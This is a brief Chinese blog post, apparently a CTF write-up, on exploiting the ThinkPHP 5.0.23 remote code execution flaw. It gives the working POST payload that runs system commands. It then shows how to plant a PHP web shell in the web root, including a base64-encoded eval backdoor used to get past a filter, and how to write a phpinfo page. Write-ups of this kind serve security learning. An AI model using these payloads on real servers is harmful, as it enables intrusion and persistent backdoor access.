[ThinkPHP]5.0.23-Rce

[ThinkPHP]5.0.23-Rce

1.thinkphp漏洞题目,百度下thinkphp5.0.x漏洞

将控制的url参数s的设置为captcha,并且设置post数据:_method=__construct&filter=system&method=get&server[REQUEST_METHOD]=whoami

 

 

 

然后可以执行远程的命令漏洞

2.我的思路是利用echo 通过重定向>将后门写到文件里面去

先看看当前路径

 

 

 

 

 

 再通过ls命令看看当前文件

 

 

 可以写入test.php

payload:echo "<? $_POST[hhz];?>" >/var/www/public/test.php

 

 

 

 

 

 

 

抓包后发现POST被过滤了

3.想着试试base64加密后写入试试

payload:echo "PD9waHAgQGV2YWwoJF9QT1NUWydoaHonXSk7Pz4=" | base64 -d > test.php
抓取后可以看到是写进去了

蚁剑连接试试,结果没有找过flag,猜想是不是放phpinfo里面了,忙活半天

 

 既然再这样那么直接把phpinfo内容写入即可

payload:echo "<? phpinfo()?>" >/var/www/public/test.php

然后直接访问test.php即可

posted @ 2022-07-05 15:27  L0VEhzzz  阅读(1414)  评论(0编辑  收藏  举报